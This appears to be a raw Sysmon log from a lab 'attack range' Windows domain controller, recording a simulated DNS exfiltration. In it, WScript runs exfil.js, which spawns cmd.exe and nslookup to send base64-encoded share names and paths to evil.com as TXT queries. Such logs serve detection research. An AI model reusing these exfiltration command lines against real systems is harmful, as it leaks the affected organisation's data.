U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhjpw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.754{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxxrdz.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.723{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.738{2E1864BB-1901-629A-A346-000000005F02}18047716C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-A446-000000005F02}7548C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.723{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.723{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.723{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.723{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A446-000000005F02}7548C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.723{2E1864BB-1901-629A-A246-000000005F02}66606176C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-A446-000000005F02}7548C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.736{2E1864BB-1901-629A-A446-000000005F02}7548C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-A246-000000005F02}6660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxxrdz.tmp 2>&1 354300x8000000000000000216386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51383- 354300x8000000000000000216385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51382- 354300x8000000000000000216384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.080{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51382- 354300x8000000000000000216383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.079{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51381- 354300x8000000000000000216382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.079{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51381- 10341000x8000000000000000216381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.707{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-A346-000000005F02}1804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.707{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-A346-000000005F02}1804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.707{2E1864BB-1901-629A-A346-000000005F02}18047716C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-A246-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.685{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A346-000000005F02}1804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.685{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A246-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.685{2E1864BB-18E0-629A-6742-000000005F02}39767884C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-A246-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.691{2E1864BB-1901-629A-A246-000000005F02}6660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxxrdz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.685{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtd.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.654{2E1864BB-1901-629A-A046-000000005F02}41561960C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-A146-000000005F02}644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.638{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.638{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.638{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.638{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.638{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A146-000000005F02}644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.638{2E1864BB-1901-629A-9F46-000000005F02}68487996C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-A146-000000005F02}644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.650{2E1864BB-1901-629A-A146-000000005F02}644C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-9F46-000000005F02}6848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtd.tmp 2>&1 10341000x8000000000000000216361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 